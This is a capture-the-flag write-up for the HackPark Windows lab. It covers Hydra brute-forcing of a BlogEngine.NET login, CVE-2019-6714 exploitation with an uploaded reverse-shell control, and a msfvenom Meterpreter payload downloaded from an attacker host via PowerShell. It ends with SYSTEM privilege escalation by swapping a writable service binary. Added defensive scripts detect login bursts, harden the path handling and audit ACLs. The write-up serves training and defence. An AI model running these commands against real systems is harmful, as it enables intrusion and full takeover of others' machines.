HackPark

Difficulty: advanced · Time: 1h 5m · Writeup

Windows machine with BlogEngine.NET

Learning Objectives

  • Brute force login
  • Exploit BlogEngine
  • Windows enumeration
  • Service privilege escalation

HackPark is a Windows machine featuring BlogEngine.NET exploitation. Learn to brute force web logins with Hydra, exploit CVE-2019-6714 for initial access, and use Windows Scheduler for privilege escalation.

The creepy clown on the website is Pennywise from Stephen King's "IT". Don't let him distract you from the real horror: unpatched web applications!

Reconnaissance

bash
# Port scan
nmap -sV -sC TARGET_IP
# Results:
# 80/tcp - HTTP (IIS httpd 8.5)
# 3389/tcp - RDP

# Web enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /admin, /content, /Account

The website is running BlogEngine.NET. Check the login page:

bash
# Visit http://TARGET_IP/Account/login.aspx
# Default user for BlogEngine is often 'admin'

Brute Force with Hydra

To brute force the login, we need to understand the POST request:

bash
# Capture the login request with Burp or browser dev tools
# POST parameters:
# __VIEWSTATE=...
# __EVENTVALIDATION=...
# ctl00$MainContent$LoginUser$UserName=admin
# ctl00$MainContent$LoginUser$Password=test
# ctl00$MainContent$LoginUser$LoginButton=Log+in

# Failure message: "Login failed"

ASP.NET uses __VIEWSTATE and __EVENTVALIDATION tokens. Hydra can handle these, but you need to capture the exact parameter names.

bash
# Hydra brute force (the $ in the parameter names is escaped so the shell
# does not expand them as variables)
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP http-post-form "/Account/login.aspx:__VIEWSTATE=&__EVENTVALIDATION=&ctl00\$MainContent\$LoginUser\$UserName=^USER^&ctl00\$MainContent\$LoginUser\$Password=^PASS^&ctl00\$MainContent\$LoginUser\$LoginButton=Log+in:Login failed" -V

# Password found: 1qaz2wsx

# Alternative: Use Burp Intruder for more control

Hydra Syntax

Format: "page:parameters:failure_string". Use ^USER^ and ^PASS^ as placeholders. Escape $ with \$ in parameter names.
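From the defender's side, the same POST pattern that Hydra relies on is exactly what shows up in the IIS logs: one client IP posting to /Account/login.aspx many times per minute, each answered with a 200 (the login page re-rendered with "Login failed"), and then a 302 once a password works. The script below is an added example, not part of the original writeup or of BlogEngine.NET: it parses a constructed IIS W3C log excerpt (field order from the #Fields header) and flags client IPs with a burst of failed logins, noting whether a redirect followed. The 200-on-failure / 302-on-success mapping is an assumption about ASP.NET forms login behaviour; tune it to what your own logs show.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"   # BlogEngine.NET login page from the writeup
WINDOW = timedelta(seconds=60)       # sliding window for counting attempts
THRESHOLD = 5                        # failed POSTs within WINDOW that trigger an alert

# Constructed IIS W3C log excerpt (invented for this example). 192.0.2.20 hammers
# the login page and then receives a 302; 198.51.100.7 is an ordinary user.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs-Referer sc-status sc-substatus sc-win32-status time-taken
2019-08-04 15:00:01 10.10.10.5 GET /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 31
2019-08-04 15:00:02 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 40
2019-08-04 15:00:03 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 38
2019-08-04 15:00:04 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 39
2019-08-04 15:00:05 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 41
2019-08-04 15:00:06 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 37
2019-08-04 15:00:07 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 200 0 0 42
2019-08-04 15:00:08 10.10.10.5 POST /Account/login.aspx - 80 - 192.0.2.20 Mozilla/5.0+(X11) - 302 0 0 55
2019-08-04 15:01:00 10.10.10.5 POST /Account/login.aspx - 80 - 198.51.100.7 Mozilla/5.0+(Windows) - 200 0 0 36
2019-08-04 15:01:30 10.10.10.5 POST /Account/login.aspx - 80 - 198.51.100.7 Mozilla/5.0+(Windows) - 302 0 0 58
"""


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines rather than mis-assign columns
        yield dict(zip(fields, values))


def find_login_bursts(text, threshold=THRESHOLD, window=WINDOW):
    """Return {client_ip: {"failures": n, "success_after_burst": bool}} for every
    client that sent at least `threshold` failed login POSTs inside one `window`.
    Assumption: a failed login answers 200 (page re-rendered), a success answers 302."""
    attempts = defaultdict(list)  # client ip -> [(timestamp, status), ...]
    for rec in parse_iis_log(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != LOGIN_PATH.lower():
            continue
        ts = datetime.strptime(f'{rec["date"]} {rec["time"]}', "%Y-%m-%d %H:%M:%S")
        attempts[rec["c-ip"]].append((ts, rec["sc-status"]))

    alerts = {}
    for ip, events in attempts.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            in_window = [status for t, status in events[i:] if t - start <= window]
            failures = in_window.count("200")
            if failures >= threshold:
                alerts[ip] = {"failures": failures, "success_after_burst": "302" in in_window}
                break  # first qualifying window is enough to raise the alert
    return alerts


if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        verdict = "and a redirect followed (likely compromised)" if info["success_after_burst"] else ""
        print(f"{ip}: {info['failures']} failed logins in {WINDOW.seconds}s {verdict}")
```

Run it against a real log by replacing SAMPLE_LOG with the contents of a file from C:\inetpub\logs\LogFiles; the window and threshold are deliberately conservative, since a password-spray that paces itself under the threshold still leaves the 200-then-302 signature for the same client.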

BlogEngine.NET Exploitation

After login, identify the BlogEngine version:

bash
# Check version in admin panel or /admin/about.cshtml
# BlogEngine.NET 3.3.6.0 - Vulnerable!

# Search for exploits
searchsploit blogengine
# BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution

# CVE-2019-6714 - file upload vulnerability in theme editing

CVE-2019-6714 Exploitation

1. Download exploit: searchsploit -m aspx/webapps/46353.cs
2. Modify exploit: edit IP and port in PostView.ascx
3. Upload file: Admin → Content → Posts → Edit → File Manager → Upload PostView.ascx
4. Trigger: visit /?theme=../../App_Data/files to execute
bash
# Get the exploit
searchsploit -m aspx/webapps/46353.cs
mv 46353.cs PostView.ascx

# Edit the file - change IP and PORT
# TcpClient client = new TcpClient("YOUR_IP", 4444);

# In admin panel:
# 1. Go to Content → Posts
# 2. Edit any post
# 3. Click the file manager icon
# 4. Upload PostView.ascx

# Start listener
nc -lvnp 4444

# Trigger the exploit
curl "http://TARGET_IP/?theme=../../App_Data/files"

# Shell received!
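The root cause of CVE-2019-6714 is the combination of two weaknesses: the theme name from the query string is spliced into a filesystem path without validation, so ../../ walks out of the themes directory, and the file manager lets an authenticated user upload an executable .ascx control into App_Data/files. The example below is added here and is not BlogEngine.NET's code: it models the flawed path construction next to a hardened version, plus an upload allowlist. The web root and the Custom/Themes layout are assumptions; posixpath is used so the path arithmetic behaves the same on any host.

```python
import posixpath
import re

# Hypothetical web root and theme layout (assumption, not taken from the page).
WEB_ROOT = "/inetpub/wwwroot/blog"
THEMES_DIR = posixpath.join(WEB_ROOT, "Custom", "Themes")

# A theme is a plain directory name: letters, digits, '-' and '_' only.
THEME_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Upload allowlist for the file manager: never .ascx/.aspx/.cshtml or anything IIS would execute.
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def vulnerable_theme_view(theme):
    """The flawed pattern: the user-controlled theme name goes straight into a path,
    so '..' segments escape THEMES_DIR and can point at the upload folder."""
    return posixpath.normpath(posixpath.join(THEMES_DIR, theme, "PostView.ascx"))


def inside_themes_dir(path):
    """True only if the normalised path still lies under THEMES_DIR."""
    resolved = posixpath.normpath(path)
    return posixpath.commonpath([resolved, THEMES_DIR]) == THEMES_DIR


def hardened_theme_view(theme):
    """Reject anything that is not a plain theme name, then confirm the resolved
    path is still inside the themes directory (defence in depth)."""
    if not THEME_NAME_RE.match(theme):
        raise ValueError("invalid theme name")
    resolved = posixpath.normpath(posixpath.join(THEMES_DIR, theme, "PostView.ascx"))
    if not inside_themes_dir(resolved):
        raise ValueError("theme path escapes themes directory")
    return resolved


def is_safe_theme(theme):
    """Convenience wrapper: does the hardened resolver accept this theme value?"""
    try:
        hardened_theme_view(theme)
        return True
    except ValueError:
        return False


def is_allowed_upload(filename):
    """Allowlist the extension of an uploaded file name; strip any directory part first."""
    base = posixpath.basename(filename.replace("\\", "/"))
    ext = posixpath.splitext(base)[1].lower()
    return ext in ALLOWED_UPLOAD_EXT and ".." not in base


if __name__ == "__main__":
    payload = "../../App_Data/files"   # the theme value from the writeup's trigger URL
    print("vulnerable resolver loads:", vulnerable_theme_view(payload))
    print("hardened resolver accepts it:", is_safe_theme(payload))
    print("upload of PostView.ascx allowed:", is_allowed_upload("PostView.ascx"))
```

Both checks matter: the name regex stops the traversal, and the allowlist stops the second half of the chain, where a control file uploaded through the file manager is what actually gets compiled and executed once the traversal reaches it.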

Upgrading to Meterpreter

bash
# Generate Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=5555 -f exe -o shell.exe

# Host it
python3 -m http.server 80

# On target, download and execute
powershell -c "Invoke-WebRequest -Uri http://YOUR_IP/shell.exe -OutFile C:\Windows\Temp\shell.exe"
C:\Windows\Temp\shell.exe

# In Metasploit
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 5555
run

Privilege Escalation

bash
# Check system info
systeminfo
# Windows 2012 R2

# In Meterpreter
meterpreter> getuid
# Server username: IIS APPPOOL\Blog

# Check for abnormal services (auto-start services outside C:\Windows)
meterpreter> shell
C:\> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# Found: WindowsScheduler in C:\Program Files (x86)\SystemScheduler\

The Windows Scheduler service runs with SYSTEM privileges and has interesting log files:

bash
# Check scheduler logs
type "C:\Program Files (x86)\SystemScheduler\Events\20198415519.INI_LOG.txt"

# Log shows:
# 08/04/19 15:06:01,Event Started : Message.exe
# The service runs Message.exe regularly as SYSTEM!

# Check permissions
icacls "C:\Program Files (x86)\SystemScheduler\Message.exe"
# Everyone has write access!

When a SYSTEM service regularly executes a file that any user can write to, replacing that file with a payload means the next scheduled run executes the payload as SYSTEM.
bash
# Replace Message.exe with our shell
# First, rename original
move "C:\Program Files (x86)\SystemScheduler\Message.exe" "C:\Program Files (x86)\SystemScheduler\Message.exe.bak"

# Copy our shell (the multi/handler on port 5555 from the Meterpreter section must still be listening)
copy C:\Windows\Temp\shell.exe "C:\Program Files (x86)\SystemScheduler\Message.exe"

# Wait for scheduled task or restart service
# Shell received as SYSTEM!

meterpreter> getuid
# NT AUTHORITY\SYSTEM
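The icacls check above is the one that decides this box, and it is also the check an administrator should be running routinely over every auto-start service binary found by the earlier wmic query. The script below is an added example, not from the writeup or from the SystemScheduler product: it parses icacls-style output and reports any ACE that gives a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) a right that allows modifying or replacing the file. The two output samples are constructed for this example; the ACEs in them are invented and not copied from the box.

```python
import re

# The executable the writeup finds; the ACEs below are constructed, not the real ones.
TARGET = r"C:\Program Files (x86)\SystemScheduler\Message.exe"

# Constructed icacls output for a weak configuration (Everyone has Full control).
SAMPLE_ICACLS_WEAK = (
    TARGET + " Everyone:(I)(F)\n"
    "                                                    BUILTIN\\Administrators:(I)(F)\n"
    "                                                    NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                                                    BUILTIN\\Users:(I)(RX)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# Constructed icacls output after remediation (low-privileged principals can only read/execute).
SAMPLE_ICACLS_FIXED = (
    TARGET + " BUILTIN\\Administrators:(I)(F)\n"
    "                                                    NT AUTHORITY\\SYSTEM:(I)(F)\n"
    "                                                    BUILTIN\\Users:(I)(RX)\n"
    "                                                    Everyone:(I)(RX)\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# Principals that any local user (or the IIS app pool identity) effectively belongs to.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls rights that let the holder change or replace the file: simple rights
# (F, M, W, D) and the specific rights that imply writing or deleting.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}

# One ACE: "<identity>:(flag)(flag)..." where identities may contain spaces and backslashes.
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<perms>(?:\([^()]*\))+)$")


def parse_icacls(output, path):
    """Return [(identity, set_of_right_tokens), ...] from icacls output for `path`.
    The first line carries the path before the first ACE, so it is stripped off."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = set()
        for group in re.findall(r"\(([^()]*)\)", m.group("perms")):
            tokens.update(t.strip() for t in group.split(","))
        aces.append((m.group("who"), tokens))
    return aces


def weak_aces(output, path):
    """Report (identity, [write rights]) for low-privileged principals that can modify the file."""
    findings = []
    for who, rights in parse_icacls(output, path):
        if "DENY" in rights:
            continue  # a deny ACE restricts rather than grants
        if who.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS:
            findings.append((who, sorted(rights & WRITE_RIGHTS)))
    return findings


if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_ICACLS_WEAK), ("fixed", SAMPLE_ICACLS_FIXED)):
        print(label, "->", weak_aces(sample, TARGET) or "no writable ACE for low-privileged principals")
```

To use it on a live host, feed it the output of icacls for each path returned by the wmic query; any finding means the service binary can be swapped by an unprivileged user, which is precisely the condition the privilege escalation above depends on.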

Getting Flags

bash
# User flag
type C:\Users\jeff\Desktop\user.txt

# Root flag
type C:\Users\Administrator\Desktop\root.txt

Knowledge Check

Question 1 of 2: What vulnerability was exploited for initial access?

Key Takeaways

  • Web login brute forcing requires understanding POST parameters
  • BlogEngine.NET 3.3.6 is vulnerable to authenticated RCE
  • Scheduled tasks running writable executables enable privilege escalation
  • Always check service executable permissions on Windows
  • Log files reveal scheduled task behavior and timing